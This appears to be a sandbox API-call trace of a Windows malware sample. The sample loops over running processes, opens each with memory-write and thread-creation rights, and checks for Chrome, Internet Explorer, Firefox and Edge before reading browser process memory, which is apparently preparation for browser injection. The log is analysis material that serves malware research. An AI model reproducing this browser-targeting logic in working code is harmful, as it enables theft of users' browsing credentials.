	[0243.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.852] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.853] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0243.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x8dc4
	[0243.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.854] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0243.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.854] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0243.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.854] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0243.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.855] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.855] NtQueryInformationProcess (in: ProcessHandle=0x8dc4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0243.855] ReadProcessMemory (in: hProcess=0x8dc4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0243.855] ReadProcessMemory (in: hProcess=0x8dc4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0243.855] ReadProcessMemory (in: hProcess=0x8dc4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0243.855] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0243.856] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0243.856] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x8dc8
	[0243.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.857] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0243.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.857] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0243.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.857] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0243.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.857] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.858] NtQueryInformationProcess (in: ProcessHandle=0x8dc8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0243.858] ReadProcessMemory (in: hProcess=0x8dc8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0243.858] ReadProcessMemory (in: hProcess=0x8dc8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0243.858] ReadProcessMemory (in: hProcess=0x8dc8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0243.858] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0243.858] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0243.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x8dcc
	[0243.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.859] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0243.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.859] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.862] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0243.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.862] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.863] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0243.863] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x8dd0
	[0243.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.864] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0243.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.864] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.864] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0243.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.865] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.865] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.866] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x8dd4
	[0243.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.866] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.866] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.866] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.867] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.867] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.868] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.869] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x8dd8
	[0243.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.869] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.869] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.869] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.870] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.870] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.871] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x8ddc
	[0243.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.871] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.871] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.872] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.872] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.872] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0243.873] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x8de0
	[0243.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.873] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0243.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.873] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.874] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0243.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.874] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.875] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x8de4
	[0243.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.904] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.905] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.905] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.906] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.906] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.907] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x8de8
	[0243.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.907] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.908] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.908] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.908] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.909] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0243.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x8dec
	[0243.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.910] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0243.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.910] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.910] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0243.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.910] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.911] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0243.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x8df0
	[0243.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.912] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.912] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.912] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.913] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.913] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0243.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x8df4
	[0243.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.914] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0243.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.914] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.915] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0243.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.915] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.915] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8df8
	[0243.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.916] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0243.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.916] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0243.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.917] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0243.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0243.917] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0243.917] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0243.918] CloseHandle (hObject=0x4fd0) returned 1
	[0243.918] Sleep (dwMilliseconds=0x64) 
	[0244.032] GetCurrentProcessId () returned 0x110
	[0244.032] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0244.035] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0244.036] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0244.036] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0244.037] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8dfc
	[0244.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.037] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.038] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.038] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.038] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.038] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0244.039] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8e00
	[0244.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.039] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.040] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.040] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.040] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.040] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0244.041] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x8e04
	[0244.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.041] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0244.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.042] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.042] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0244.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.042] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.043] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0244.043] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8e08
	[0244.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.044] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0244.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.044] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.044] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0244.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.045] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.045] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0244.045] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8e0c
	[0244.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.046] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0244.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.046] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.046] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0244.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.047] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.048] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0244.049] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8e10
	[0244.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.049] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0244.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.049] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.050] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0244.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.050] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.050] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0244.051] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8e14
	[0244.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.051] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0244.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.051] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0244.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.052] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0244.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0244.052] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0244.052] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0244.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8e18
